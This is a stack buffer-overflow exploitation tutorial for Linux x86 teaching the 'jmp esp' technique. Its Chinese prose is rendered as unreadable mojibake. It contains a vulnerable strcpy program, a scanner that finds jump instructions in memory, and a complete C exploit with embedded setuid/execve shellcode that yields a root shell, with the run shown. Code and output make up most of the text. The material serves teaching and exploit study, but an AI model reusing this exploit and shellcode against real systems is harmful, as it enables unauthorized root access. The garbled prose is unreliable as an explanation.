ÀûÓÃjmp esp Ö´ÐÐshellcode

1. Ç°ÑÔ.
LinuxÏÂÃæBuffer overflowÖÐÀûÓÃÌøתµ½¶ÑÕ»ÖеÄshellcodeÓõıȽ϶à, windowsÏÂÃæÀûÓÃjmp espÌøתµÄ±È½Ï¶à, ±¾ÎÄûÓÐʲô¼¼ÊõÐÂÒâ,²»¹ýÊÇÍ»·¢ÆæÏë, ¸Ä±äÒ»ÏÂÎÒ×Ô¼ºÒÔÍùµÄ·½·¨¶øÒÑ.
2. ±È½Ï.
¾­³£Ê¹ÓõÄÌøתµ½¶ÑÕ»µÄshellcode·½·¨ÓкܺõÄÒ»Ãæ, ±ÈÈç¿ÉÒÔ°Ñshellcode·Åµ½ENVÀïÃæ, ÕâÑù¿ÉÒÔÌӱܳ¤¶ÈµÄÏÞÖÆ. ȱµãÊÇÕâ¸ö¼ÆËãÂé·³,Ôö´óNOPÊǸö²»´íµÄÑ¡Ôñ. Jmp espÒ²ÊǸö²»´íµÄÑ¡ÔñŶ, ÕâÑù¿ÉÒÔ²»ÓÃÖªµÀshellcodeµÄ¾ßÌåλÖÃÁË.
3. ¿´¿´Ôõô»ØÊ°É.
ÓÐÎÊÌâµÄ³ÌÐò:
[netconf@linux1 test]$ cat vul.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int foo(char *s1)
{
char buffer[20];
memset(buffer,0,20);
strcpy(buffer,s1);
printf("input:%s\r\n",buffer);
return 0;
}

main(int argc,char **argv)
{

if(argc<2)
{
printf("Usage:%s <string>\n",argv[0]);
exit(0);
}
foo(argv[1]);
exit(0);
}
ºÜÆÕͨµÄÒ»¸öbuffer overflow.
¶ÑÕ»½á¹¹ÈçÏÂËùʾ:
|AAAA¡­¡­¡­¡­¡­.A| ÆäËûÄÚÈÝ | ebp | eip |
Òç³öºó, Ò»°ãÊÇÕâÑùµÄ:
|AAAAAA¡­¡­¡­...A¡­¡­.AAAAAAAA|shellcodeµØÖ·|
ÀûÓÃshellcodeµØÖ·Ìæ»»µô±£´æµÄeipÖµ
ÀûÓÃjmp espµÄ¶ÑÕ»½á¹¹:
|AAAAAAAAAAAAAAAAAAAAAA|jmp esp addr|shellcode
ÓÃjmp esp addrÀ´¸²¸Çeip,ÕâÑùµ±³ÌÐòÖ´ÐÐeipµÄʱºò, »áÖ´ÐÐjmp espÖ¸Áî, Õâ¸öʱºòespÒѾ­ÊÇÎÒÃÇ´æ·ÅshellcodeµÄµØÖ·ÁË, ÕâÑùµÄ¾«È·ÐԾʹó´óÌá¸ßÁË,¶øÇÒ²»ÓöàÓàµÄNOPÀ´¸²¸Ç.
Ê×ÏÈ, ÎÒÃÇÐèÒªÒ»¸öµØÖ·,Õâ¸öµØÖ·µÄÄÚÈݵĻã±à´úÂëÓ¦¸ÃÊÇjmp esp , ÎÒÃÇÐèҪдһ¸öС³ÌÐòÀ´»ñµÃÎÒÃÇËùÐèÒªµÄµØÖ·:
[netconf@linux1 test]$ cat findesp.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
unsigned int i=0x4211cc79;
unsigned int a=0;
unsigned char *p;
void de(int j)
{
printf("\r\nGot SIGSEGV:");
printf("%p\r\n",p+a);
a++;
exit(0);
}
main()
{
p=(unsigned char *)i;
signal(SIGSEGV,de);
foo();
}
int foo()
{
while((unsigned int)p+a<0xbfffffff)
{
fflush(stdout);
if((*(p+a)==0xff) && (*(p+a+1)==0xe4))
{
printf("found it!!,p addr:%p\n",p+a);
a+=2;
foo();
}
a++;
}
exit(0);
}
ÔËÐÐÒ»ÏÂ:
[netconf@linux1 test]$ ./findesp
found it!!,p addr:0x4211ccf7
found it!!,p addr:0x4211dd5b
found it!!,p addr:0x4211dee7
found it!!,p addr:0x4211e15f
found it!!,p addr:0x4211e59f
found it!!,p addr:0x42125aa3
found it!!,p addr:0x42125c13

Got SIGSEGV:0x4212f000
[netconf@linux1 test]$
²»´í°É, µÃµ½Á˺ܶà¸öÂú×ãÌõ¼þµÄµØÖ·, ÎÒÃÇËæ±ãÑ¡Ò»¸ö, Ö»Òª²»´ø0x00¾ÍºÃ.
ÕâÑùÎÒÃÇ¿ÉÒÔд³öÕâÑùÒ»¸öexploit:
[netconf@linux1 test]$ cat exp.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <error.h>

#define JMPESP 0x42125aa3

char progname[]="./vul";
char shellcode[]=
"\x31\xdb\x31\xc9\x31\xd2\x31\xc0\xb0\xa4\xcd\x80"
"\x89\xd8\xb0\x17\xcd\x80"
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

main(int argc,char **argv)
{
char buffer[1024];
int num=44,i=0;

memset(buffer,0,1024);
memset(buffer,'A',num);
buffer[num++]=JMPESP & 0xff;
buffer[num++]=(JMPESP>>8) & 0xff;
buffer[num++]=(JMPESP>>16) & 0xff;
buffer[num++]=(JMPESP>>24) & 0xff;
memcpy(buffer+num,shellcode,sizeof(shellcode));
execl(progname,progname,buffer,NULL);
}
ÊDz»ÊǺ̵ܶijÌÐò?
[netconf@linux1 test]$ ./exp
¡­¡­¡­¡­¡­¡­¡­¡­
. Í€1Û‰Ø@Í€èÜÿÿÿ/bin/sh
sh-2.05b#
ÇáËɸ㶨.